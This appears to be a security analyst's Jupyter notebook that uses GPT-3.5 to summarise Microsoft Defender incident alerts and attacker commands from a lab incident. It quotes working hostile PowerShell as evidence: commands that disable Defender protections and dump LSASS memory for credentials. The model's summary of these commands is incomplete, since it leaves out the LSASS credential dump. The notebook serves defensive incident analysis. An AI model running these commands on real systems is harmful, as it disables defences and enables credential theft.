# Summarizing: Incident Data
---
* Collaborators:
    * Roberto Rodriguez (@Cyb3rWard0g)
* References:
* https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/automating-security-operations-using-windows-defender-atp-apis/ba-p/294434
* https://www.deeplearning.ai/short-courses/

## Import Modules

In [1]:
import os
import openai
from dotenv import load_dotenv

## Set Open AI Key

In [2]:
# Get your key: https://platform.openai.com/account/api-keys
load_dotenv()
openai.api_key = os.getenv("OPENAI_API_KEY")

## Create Completion Function

In [3]:
def get_completion(prompt, model="gpt-3.5-turbo"):
    messages = [{"role":"user", "content":prompt}]
    response = openai.ChatCompletion.create(
        model=model,
        messages=messages,
        temperature=0, # Degree of randomness
    )
    return response.choices[0].message["content"]

## Download Incident Data
I downloaded the following alerts from incident data I generated in a lab environment

### Get Access Token

In [4]:
import requests

load_dotenv()

tenantId = os.getenv("AZURE_TENANT_ID")
auth_url = f'https://login.microsoftonline.com/{tenantId}/oauth2/v2.0/token'
appId = 'dd410380-6316-4116-ba97-3ff7c439e94f' 
appSecret = os.getenv("INCIDENT_READER_CLIENT_SECRET")
scope = 'https://api.securitycenter.microsoft.com/.default' 

data = {
    'grant_type': 'client_credentials',
    'client_id': appId,
    'client_secret': appSecret,
    'scope': scope
}
response = requests.post(auth_url, data=data).json()
token = response['access_token']

### Query Incident Data

In [5]:
from scripts.m365d import get_alerts

load_dotenv()

access_token = token
incidentId = "2444"
alerts = get_alerts(access_token, incidentId)

In [19]:
all_alerts = alerts.get('value')

In [28]:
alerts_list = []
for alert in all_alerts:
    alert_dict = dict()
    alert_dict['title'] = alert['title']
    alert_dict['description'] = alert['description']
    alerts_list.append(alert_dict)

In [34]:
prompt = f"""
Prodice a summar of my incident based on the following alerts.
Give me a few sentences summarizing what actually happened based
on the alerts names and descriptions.

Review: ```{alerts_list}```
"""

response = get_completion(prompt)
print(response)

Based on the alerts, it appears that there was a suspicious process executed in PowerShell, indicating potential malicious activity. There were also multiple instances of suspicious behavior by an HTML application, suggesting the use of HTML files to deliver malware. Additionally, there were suspicious LDAP queries, indicating reconnaissance activity, and suspicious user account discovery, suggesting attempts to gather information for future attacks. Furthermore, event logs were cleared, an uncommon file was created and added to the startup folder, and suspicious PowerShell commands were executed, all potentially indicating malicious activity. There were also alerts related to potential human-operated malicious activity, suspicious remote activity, suspicious WMI process creation, suspicious PowerShell download or encoded command execution, possible initial access via OneNote, possible ransomware activity, suspicious WMI activity initiated remotely, file backups being deleted, suspicio

## Script Content Analysis

## Create a Prompt to Create a Summary

In [35]:
evidence = """
try {Set-MpPreference -DisableBehaviorMonitoring 1 -AsJob; Set-MpPreference -SevereThreatDefaultAction Allow -AsJob; Set-MpPreference -DisableRealtimeMonitoring 1 -AsJob; Add-MpPreference -ExclusionPath 'C:\Windows' -Force -AsJob} catch {}
powershell.exe /c Remove-Item -Path C:\windows\temp\ssasl.pmd -Force -ErrorAction Ignore; rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id C:\windows\temp\ssasl.pmd full | out-host; Compress-Archive  C:\windows\temp\ssasl.pmd  C:\windows\temp\ssasl.zip
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"
"""

## Run Prompt

In [37]:
prompt = f"""
Your task is to understand a few commands executed by a threat actor and then generate a summary of it. 

Summarize the review below, delimited by triple 
backticks, in at most 20 words. 

Review: ```{evidence}```
"""

response = get_completion(prompt)
print(response)

The threat actor disables behavior monitoring and real-time monitoring, adds an exclusion path, removes a file, compresses it, and retrieves email addresses.
